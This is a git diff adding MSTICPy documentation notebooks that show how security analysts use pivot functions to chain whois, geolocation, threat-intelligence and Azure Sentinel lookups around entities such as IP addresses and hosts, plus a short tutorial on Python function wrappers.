+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP           ip  result    asn     asn_cidr asn_country_code  \\\n",
+       "0  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "\n",
+       "     asn_date asn_description asn_registry  \\\n",
+       "0  2017-12-20  AMAZON-AES, US         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "\n",
+       "    nir        query   raw raw_referral referral  \n",
+       "0  None  3.88.48.125  None         None     None  "
+      ]
+     },
+     "execution_count": 65,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "pipeline1 = pipelines[0]\n",
+    "result_df = pipeline1.run(data=ips_df, verbose=True)\n",
+    "result_df.head(3)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding your own pivot functions\n",
+    "\n",
+    "### A simple example"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 67,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "def my_func(input: str):\n",
+    "    return {\n",
+    "        \"title\": input.upper(),\n",
+    "        \"text\": \"something\"\n",
+    "    }\n",
+    "\n",
+    "Pivot.add_pivot_function(\n",
+    "    func=my_func,\n",
+    "    container=\"cyber\",\n",
+    "    input_type=\"value\",\n",
+    "    entity_map={\"Host\": \"HostName\"},\n",
+    "    func_input_value_arg=\"input\",\n",
+    "    func_new_name=\"upper_name\",\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 68,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>title</th>\n",
+       "      <th>text</th>\n",
+       "      <th>input</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>HOST_NAME</td>\n",
+       "      <td>something</td>\n",
+       "      <td>host_name</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "       title       text      input\n",
+       "0  HOST_NAME  something  host_name"
+      ]
+     },
+     "execution_count": 68,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.Host.cyber.upper_name(\"host_name\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(2)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\")\n",
+    "    .mp_pivot.display(title=\"Alerts Sample\", head=2) \n",
+    "    .mp_pivot.run(entities.Host.cyber.upper_name, column=\"Severity\")\n",
+    ").head(3)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### A more realistic example.\n",
+    "\n",
+    "This function extracts individual elements from a list column into separate rows.\n",
+    "In this case the `nets` column."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 72,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP           ip  result    asn     asn_cidr asn_country_code  \\\n",
+       "0  3.88.48.125  3.88.48.125  Public  14618  3.80.0.0/12               US   \n",
+       "\n",
+       "     asn_date asn_description asn_registry  \\\n",
+       "0  2017-12-20  AMAZON-AES, US         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "\n",
+       "    nir        query   raw raw_referral referral  \n",
+       "0  None  3.88.48.125  None         None     None  "
+      ]
+     },
+     "execution_count": 72,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    # Get IP Type\n",
+    "    .mp_pivot.run(IpAddress.util.ip_type, column='IP', join='inner')\n",
+    "    # Filter to only public IPs\n",
+    "    .query(expr='result == \"Public\"')\n",
+    "    # Get Whois info\n",
+    "    .mp_pivot.run(IpAddress.util.whois, column='IP', join='inner')\n",
+    ").head(1)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 70,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "def extract_nets(data, col):\n",
+    "    out_series = []\n",
+    "    for net in result_df.nets:\n",
+    "        for entry in net:\n",
+    "            out_series.append(pd.Series(entry))\n",
+    "    return pd.DataFrame(out_series) \n",
+    "\n",
+    "Pivot.add_pivot_function(\n",
+    "    func=extract_nets,\n",
+    "    container=\"whois\",\n",
+    "    input_type=\"dataframe\",\n",
+    "    entity_map={\"IpAddress\": \"Address\"},\n",
+    "    func_df_param_name=\"data\",\n",
+    "    func_df_col_param_name=\"col\",\n",
+    "    func_new_name=\"extract_nets\",\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 71,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>cidr</th>\n",
+       "      <th>name</th>\n",
+       "      <th>handle</th>\n",
+       "      <th>range</th>\n",
+       "      <th>description</th>\n",
+       "      <th>country</th>\n",
+       "      <th>state</th>\n",
+       "      <th>city</th>\n",
+       "      <th>address</th>\n",
+       "      <th>postal_code</th>\n",
+       "      <th>emails</th>\n",
+       "      <th>created</th>\n",
+       "      <th>updated</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.0.0.0/9</td>\n",
+       "      <td>AT-88-Z</td>\n",
+       "      <td>NET-3-0-0-0-1</td>\n",
+       "      <td>3.0.0.0 - 3.127.255.255</td>\n",
+       "      <td>Amazon Technologies Inc.</td>\n",
+       "      <td>US</td>\n",
+       "      <td>WA</td>\n",
+       "      <td>Seattle</td>\n",
+       "      <td>410 Terry Ave N.</td>\n",
+       "      <td>98109</td>\n",
+       "      <td>[aws-routing-poc@amazon.com, abuse@amazonaws.com, amzn-noc-contact@amazon.com, aws-dogfish-routi...</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>2018-03-30</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>AMAZON-IAD</td>\n",
+       "      <td>NET-3-80-0-0-1</td>\n",
+       "      <td>None</td>\n",
+       "      <td>Amazon Data Services NoVa</td>\n",
+       "      <td>US</td>\n",
+       "      <td>VA</td>\n",
+       "      <td>Herndon</td>\n",
+       "      <td>13200 Woodland Park Road</td>\n",
+       "      <td>20171</td>\n",
+       "      <td>[amzn-noc-contact@amazon.com, abuse@amazonaws.com]</td>\n",
+       "      <td>2018-08-22</td>\n",
+       "      <td>2018-08-22</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          cidr        name          handle                    range  \\\n",
+       "0    3.0.0.0/9     AT-88-Z   NET-3-0-0-0-1  3.0.0.0 - 3.127.255.255   \n",
+       "1  3.80.0.0/12  AMAZON-IAD  NET-3-80-0-0-1                     None   \n",
+       "\n",
+       "                 description country state     city                   address  \\\n",
+       "0   Amazon Technologies Inc.      US    WA  Seattle          410 Terry Ave N.   \n",
+       "1  Amazon Data Services NoVa      US    VA  Herndon  13200 Woodland Park Road   \n",
+       "\n",
+       "  postal_code  \\\n",
+       "0       98109   \n",
+       "1       20171   \n",
+       "\n",
+       "                                                                                                emails  \\\n",
+       "0  [aws-routing-poc@amazon.com, abuse@amazonaws.com, amzn-noc-contact@amazon.com, aws-dogfish-routi...   \n",
+       "1                                                   [amzn-noc-contact@amazon.com, abuse@amazonaws.com]   \n",
+       "\n",
+       "      created     updated  \n",
+       "0  2017-12-20  2018-03-30  \n",
+       "1  2018-08-22  2018-08-22  "
+      ]
+     },
+     "execution_count": 71,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.datamodel.entities import IpAddress\n",
+    "(\n",
+    "    ips_df\n",
+    "    # Get IP Type\n",
+    "    .mp_pivot.run(IpAddress.util.ip_type, column='IP', join='inner')\n",
+    "    # Filter to only public IPs\n",
+    "    .query(expr='result == \"Public\"')\n",
+    "    # Get Whois info\n",
+    "    .mp_pivot.run(IpAddress.util.whois, column='IP', join='inner')\n",
+    "    .mp_pivot.run(IpAddress.whois.extract_nets, column='nets')\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Appendix - how do pivot wrappers work?\n",
+    "\n",
+    "In Python you can create functions that return other functions.\n",
+    "On the way they can change how the arguments and output are\n",
+    "processed.\n",
+    "\n",
+    "Take this simple function that just applies proper capitalization\n",
+    "to an input string."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 35,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Hello\n"
+     ]
+    }
+   ],
+   "source": [
+    "def print_me(arg):\n",
+    "    print(arg.capitalize())\n",
+    "    \n",
+    "print_me(\"hello\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If we try to pass a list to this function we get an \n",
+    "expected exception about lists not supporting `capitalize`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 66,
+   "metadata": {},
+   "outputs": [
+    {
+     "ename": "NameError",
+     "evalue": "name 'print_me' is not defined",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+      "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+      "\u001b[1;32m<ipython-input-66-94b3e61eb86f>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mprint_me\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m\"hello\"\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m\"world\"\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+      "\u001b[1;31mNameError\u001b[0m: name 'print_me' is not defined"
+     ]
+    }
+   ],
+   "source": [
+    "print_me([\"hello\", \"world\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We could create a wrapper function that checked the\n",
+    "input and iterated over the individual items if arg is a list.\n",
+    "The works but we don't want to have to do this for every \n",
+    "function that we want to have flexible input!"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Hello\n",
+      "How\n",
+      "Are\n",
+      "You\n",
+      "?\n"
+     ]
+    }
+   ],
+   "source": [
+    "def print_me_list(arg):\n",
+    "    if isinstance(arg, list):\n",
+    "        for item in arg:\n",
+    "            print_me(item)\n",
+    "    else:\n",
+    "        print_me(arg)\n",
+    "        \n",
+    "print_me_list(\"hello\")\n",
+    "print_me_list([\"how\", \"are\", \"you\", \"?\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Instead we can create a function wrapper. The outer function\n",
+    "`dont_care_func` defines an inner function, `list_or_str` and then\n",
+    "returns this function. The inner function `list_or_str` is what\n",
+    "implements the same \"is-this-a-string-or-list\" logic that we \n",
+    "saw in the previous example. \n",
+    "Crucially though, it isn't hard-coded to call `print_me` but\n",
+    "calls whatever function passed to it from the outer function\n",
+    "`dont_care_func`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# Our magic wrapper\n",
+    "\n",
+    "def dont_care_func(func):\n",
+    "    \n",
+    "    def list_or_str(arg):\n",
+    "        if isinstance(arg, list):\n",
+    "            for item in arg:\n",
+    "                func(item)\n",
+    "        else:\n",
+    "            func(arg)\n",
+    "    return list_or_str"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "How do we use this?\n",
+    "\n",
+    "We simply pass the function that we want to wrap to\n",
+    "`dont_care_func`. Recall, that this function just returns\n",
+    "an instance of the inner function. In this particular instance\n",
+    "the value `func` will have been replaced by the actual function\n",
+    "`print_me`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "print_stuff = dont_care_func(print_me)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Now we have a wrapped version of `print_me` that can\n",
+    "handle different types of input. Magic!"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Hello\n",
+      "How\n",
+      "Are\n",
+      "You\n",
+      "?\n"
+     ]
+    }
+   ],
+   "source": [
+    "print_stuff(\"hello\")\n",
+    "print_stuff([\"how\", \"are\", \"you\", \"?\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We can also define further functions and create wrapped\n",
+    "versions of those by passing them to `dont_care_func`."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 118,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "def shout_me(arg):\n",
+    "    print(arg.upper(), \"\\U0001F92C!\", end=\" \")\n",
+    "    \n",
+    "shout_stuff = dont_care_func(shout_me)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 119,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "HELLO 🤬! HOW 🤬! ARE 🤬! YOU 🤬! ? 🤬! "
+     ]
+    }
+   ],
+   "source": [
+    "shout_stuff(\"hello\")\n",
+    "shout_stuff([\"how\", \"are\", \"you\", \"?\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The wrapper functionality in Pivot is a bit more complex than\n",
+    "this but essentially operates this way."
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.10"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "2aeaa3525526453282e5e1934aa4a923": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "d24faa135bc84d798e4028cbbf8a91b9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/PivotFunctions.ipynb b/docs/notebooks/PivotFunctions.ipynb
new file mode 100644
index 000000000..e9cb9a294
--- /dev/null
+++ b/docs/notebooks/PivotFunctions.ipynb
@@ -0,0 +1,6229 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICPy Pivot Functions\n",
+    "\n",
+    "## What are Pivot Functions?\n",
+    "\n",
+    "MSTICPy has a lot of functionality distributed across many classes and modules. \n",
+    "However, there is no simple way to discover where these functions are and what types\n",
+    "of data the function is relevant to.\n",
+    "\n",
+    "Pivot functions bring this functionality together grouped around Entities.\n",
+    "\n",
+    "Entities are representations real-world objects found commonly in CyberSec investigations.\n",
+    "Some examples are: IpAddress, Host, Account, URL\n",
+    "\n",
+    "```python\n",
+    ">>> IpAddress.util.ip_type(ip_str=\"157.53.1.1\"))\n",
+    "ip \tresult\n",
+    "157.53.1.1 \tPublic\n",
+    "\n",
+    ">>> IpAddress.util.whois(\"157.53.1.1\"))\n",
+    "asn \tasn_cidr \tasn_country_code \tasn_date \tasn_description \tasn_registry \tnets \tnir \tquery \traw \traw_referral \treferral\n",
+    "NA \tNA \tUS \t2015-04-01 \tNA \tarin \t[{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '... \tNone \t157.53.1.1 \tNone \tNone \tNone\n",
+    "                                      \n",
+    ">>> IpAddress.util.geoloc(value=\"157.53.1.1\"))\n",
+    "CountryCode \tCountryName \tState \tCity \tLongitude \tLatitude \tAsn \tedges \tType \tAdditionalData \tIpAddress\n",
+    "US \tUnited States \tNone \tNone \t-97.822 \t37.751 \tNone \t{} \tgeolocation \t{} \t157.53.1.1\n",
+    "                                      \n",
+    ">>> Host.AzureSentinel.list_host_logons(host_name=\"VictimPc\")\n",
+    "Account \tEventID \tTimeGenerated \tSourceComputerId \tComputer \tSubjectUserName \tSubjectDomainName\n",
+    "NT AUTHORITY\\SYSTEM \t4624 \t2020-10-01 22:39:36.987000+00:00 \tf6638b82-98a5-4542-8bec-6bc0977f793f \tVictimPc.Contoso.Azure \tVictimPc$ \tCONTOSO\n",
+    "NT AUTHORITY\\SYSTEM \t4624 \t2020-10-01 22:39:37.220000+00:00 \tf6638b82-98a5-4542-8bec-6bc0977f793f \tVictimPc.Contoso.Azure \tVictimPc\\$ \tCONTOSO\n",
+    "NT AUTHORITY\\SYSTEM \t4624 \t2020-10-01 22:39:42.603000+00:00 \tf6638b82-98a5-4542-8bec-6bc0977f793f \tVictimPc.Contoso.Azure \tVictimPc\\$ \tCONTOSO\n",
+    "\n",
+    "```\n",
+    "\n",
+    "You can also chain pivot functions together to create a processing\n",
+    "pipeline that does multiple operations on data:\n",
+    "```python\n",
+    ">>> (\n",
+    "        suspicious_ips_df\n",
+    "        # Lookup IPs at VT\n",
+    "        .mp_pivot.run(IpAddress.ti.lookup_ipv4_VirusTotal, column=\"IPAddress\")\n",
+    "        # Filter on high severity\n",
+    "        .query(\"Severity == 'high'\")\n",
+    "        .mp_pivot.run(IpAddress.util.whois, column=\"Ioc\", join=\"left\")\n",
+    "        # Query IPs that have login attempts\n",
+    "        .mp_pivot.run(IpAddress.AzureSentinel.list_aad_signins_for_ip, ip_address_list=\"Ioc\")\n",
+    "        # Send the output of this to a plot\n",
+    "        .mp_timeline.plot(\n",
+    "            title=\"High Severity IPs with Logon attempts\",\n",
+    "            source_columns=[\"UserPrincipalName\", \"IPAddress\", \"ClientAppUsed\", \"Location\"],\n",
+    "            group_by=\"UserPrincipalName\"\n",
+    "        )\n",
+    "    )\n",
+    "\n",
+    "```\n",
+    "\n",
+    "> We'll see examples of how to do these pivoting queries later in the notebook.\n",
+    "\n",
+    "MSTICPy has had entity classes from the very early days but, until now, these\n",
+    "have only been used sporadically in the rest of the package.\n",
+    "\n",
+    "The pivot functionality exposed operations relevant to a particular\n",
+    "entity as methods of that entity. These operations could include:\n",
+    "\n",
+    "- Data queries\n",
+    "- Threat intelligence lookups\n",
+    "- Other data lookups such as GeoLocation or domain resolution\n",
+    "- and other local functionality\n",
+    "\n",
+    "## What is Pivoting?\n",
+    "\n",
+    "The name comes from the common practice of Cyber investigators navigating\n",
+    "between related entities. For example an entity/investigation chain might\n",
+    "look like the following:\n",
+    "\n",
+    "\n",
+    "| Step | Source             |  Operation              | Target             |\n",
+    "| :--: | :----------------- | :-----------------      | :----------------- |\n",
+    "| 1    | Alert              | Review alert       ->   | Source IP(A)       |\n",
+    "| 2    | Source IP(A)       | Lookup TI          ->   | Related URLs       |\n",
+    "|      |                    |                         | Malware names      |\n",
+    "| 3    | URL                | Query web logs     ->   | Requesting hosts   |\n",
+    "| 4    | Host               | Query host logons  ->   | Accounts           |\n",
+    "\n",
+    "\n",
+    "At each step there are one or more directions that you can take to\n",
+    "follow the chain of related indicators of activity in a possible attack.\n",
+    "\n",
+    "Bringing these functions into a few, well-known locations makes it easier to\n",
+    "use MSTICPy to carry out this common pivoting pattern in Jupyter notebooks."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "---\n",
+    "\n",
+    "## Getting started"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Processing imports....\n",
+      "Checking configuration....\n",
+      "No errors found.\n",
+      "No warnings found.\n",
+      "Setting notebook options....\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Notebook setup complete</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.nbinit import init_notebook\n",
+    "init_notebook(namespace=globals());"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The pivoting library depends on a number of data providers used in MSTICPy.\n",
+    "These normally need to be loaded an initialized before starting the Pivot library.\n",
+    "\n",
+    "This is mandatory for data query providers such as the AzureSentinel, Splunk or \n",
+    "MDE data providers. These usually need initialization and authentication steps\n",
+    "to load query definitions and connect to the service. \n",
+    "\n",
+    "> Note: you do not have to authenticate to the data provider before loading Pivot.<br>\n",
+    "> However, some providers are populated with additional queries only after connecting<br>\n",
+    "> to the service. These will not be added to the pivot functions unless you\n",
+    "> create a new Pivot object.\n",
+    "\n",
+    "This is optional with providers such as Threat Intelligence (TILookup) and GeoIP.\n",
+    "If you do not initialize these before starting Pivot they will be loaded with\n",
+    "the defaults as specified in your *msticpyconfig.yaml*. If you want to use a \n",
+    "specific configuration for any of these, you should load and configure them \n",
+    "before starting Pivot."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Load one or more data providers"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Please wait. Loading Kqlmagic extension...\n"
+     ]
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.reconnect();} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "az_provider = QueryProvider(\"AzureSentinel\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Initialize the Pivot library\n",
+    "\n",
+    "You can either pass an explicit list of providers to Pivot or let it look for them in\n",
+    "the notebook global namespace. In the latter case, the Pivot class will use the\n",
+    "most recently-created instance of each that it finds.\n",
+    "\n",
+    "#### What happens at initialization?\n",
+    "\n",
+    "- Any instantiated data providers are searched for relevant queries. Any queries found are added to the approriate entity or entities.\n",
+    "- TI provider is loaded and entity-specific lookups (e.g. IP, Url, File) are added as pivot functions\n",
+    "- Miscellaneous Msticpy functions and classes (e.g. GeoIP, IpType, Domain utils) are added as pivot functions to the appropriate entity.\n",
+    "\n",
+    "You can add additional functions as pivot functions by creating a registration template and importing the function.\n",
+    "Details of this are covered later in the document."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Pivot function list\n",
+    "\n",
+    "Because we haven't yet loaded the Pivot library nothing is listed."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "[]"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.Host.get_pivot_list()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Initializing the Pivot library\n",
+    "\n",
+    "You will usually see some output as provider libraries are loaded."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "This product includes GeoLite2 data created by MaxMind, available from\n",
+       "<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "This library uses services provided by ipstack.\n",
+       "<a href=\"https://ipstack.com\">https://ipstack.com</a>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "<msticpy.datamodel.pivot.Pivot at 0x1bb25d61688>"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
